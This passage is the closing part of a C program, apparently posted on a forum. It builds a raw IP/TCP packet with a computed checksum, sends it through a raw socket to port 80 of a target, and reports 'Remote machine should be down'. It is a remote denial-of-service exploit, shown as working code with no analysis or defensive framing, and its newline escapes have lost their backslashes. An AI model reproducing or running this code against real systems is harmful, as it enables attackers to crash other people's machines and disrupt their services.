pseudoheader.length = htons(sizeof(struct tcphdr)); 

if((pseudopacket = (char *)malloc(sizeof(pseudoheader)+sizeof(struct tcphdr))) == NULL) 

{ 

perror("malloc()n"); 

return EX_OSERR; 

} 

memcpy(pseudopacket, &pseudoheader, sizeof(pseudoheader)); 

memcpy(pseudopacket + sizeof(pseudoheader), packet + sizeof(struct ip), sizeof(struct tcphdr)); 

tcph->th_sum = checksum((u_short *)pseudopacket, sizeof(pseudoheader) + sizeof(struct tcphdr)); 

mysock = socket(PF_INET, SOCK_RAW, IPPROTO_RAW); 

if(!mysock) 

{ 

perror("socket!n"); 

return EX_OSERR; 

} 

if(setsockopt(mysock, IPPROTO_IP, IP_HDRINCL, (char *)&on, sizeof(on)) == -1) 

{ 

perror("setsockopt"); 

shutdown(mysock, 2); 

return EX_OSERR; 

} 

sin.sin_family = PF_INET; 

sin.sin_addr = dst; 

sin.sin_port = htons(80); 

if(sendto(mysock, packet, sizeof(struct ip) + sizeof(struct tcphdr), 0, (struct sockaddr *)&sin, sizeof(sin)) == -1) 

{ 

perror("sendto()n"); 

shutdown(mysock, 2); 

return EX_OSERR; 

} 

printf("Packet sent. Remote machine should be down.n"); 

shutdown(mysock, 2); 

return EX_OK; 

}
 
You must log in or register to reply here.
Do góry Bottom